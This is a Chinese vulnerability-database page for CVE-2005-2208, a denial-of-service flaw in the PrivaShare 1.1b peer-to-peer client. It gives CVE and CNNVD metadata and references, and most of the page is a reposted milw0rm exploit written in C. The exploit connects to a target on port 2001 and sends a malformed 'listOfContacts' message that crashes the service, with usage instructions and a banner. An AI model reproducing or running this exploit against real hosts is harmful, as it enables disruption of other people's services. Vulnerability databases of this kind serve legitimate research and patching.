PrivaShare 畸形消息 拒绝服务漏洞

PrivaShare 畸形消息 拒绝服务漏洞

漏洞ID 1108921 漏洞类型 未知
发布时间 2005-07-07 更新时间 2005-07-11
图片[1]-PrivaShare 畸形消息 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2208
图片[2]-PrivaShare 畸形消息 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200507-094
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1093
https://www.securityfocus.com/bid/89723
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-094
|漏洞详情
PrivaShare是一个P2P软件。PrivaShare1.1b版本存在拒绝服务漏洞。远程攻击者可使用畸形消息,导致系统拒绝服务(崩溃)。
|漏洞EXP
/*

   PrivaShare TCP/IP DoS Exploit
----------------------------------------

Resolve host... [OK]
 [+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
 [+] Server DoS'ed

 Tested on Windows2000 SP4
 Greats: Infam0us Gr0up Team/member,and ll of u..take care!

 Info:
 - infamous.2hell.com
 - [email protected]

*/

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
/*

        Offset 0000ca10 to 0000ca2b

0000ca10 6c 00 69 00 73 00 74 00 4f 00 66 00 43 00
6f 00 6e 00 74 00 61 00 63 00 74 00 73 00

HEX:
6c 20 69 20 73 20 74 20 4f 20 66 20 43 20 6f 20 6e 20 74
20 61 20 63 20 74


*/
"listOfContacts,null"
"***          PrivaShare TCP/IP DoS Exploit        n"
"***-----------------------------------------------n"
"***   Infam0us Gr0up - Securiti Research Team     nn"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n";



int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf("        PrivaShare TCP/IP DoS Exploit n", argv[0]);
printf("  ------------------------------------------n", argv[0]);
printf("      Infam0us Gr0up - Securiti Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]);
printf("[?]Exam: %s localhost 2001n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 2001;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR n");
exit(1);
}
printf("        PrivaShare TCP/IP DoS Exploit n", argv[0]);
printf("  ------------------------------------------rnn", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED n", argv[0]);
exit(1);
}
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILEDn");
exit(1);
}
printf("[OK]n");
printf("Target lockedn");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERRORn");
closesocket(inetdos);
exit(1);
}
printf("[OK]n ");
printf("[+] Server DoS'edn");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-07-07]
|受影响的产品
Privashare Privashare 1.1b
|参考资料

来源:SECUNIA
名称:15933
链接:http://secunia.com/advisories/15933
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=66
来源:SECTRACK
名称:1014412
链接:http://securitytracker.com/id?1014412

相关推荐: @lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability

@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability 漏洞ID 1097836 漏洞类型 Input Validation Error 发布时间 2004-09-27 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享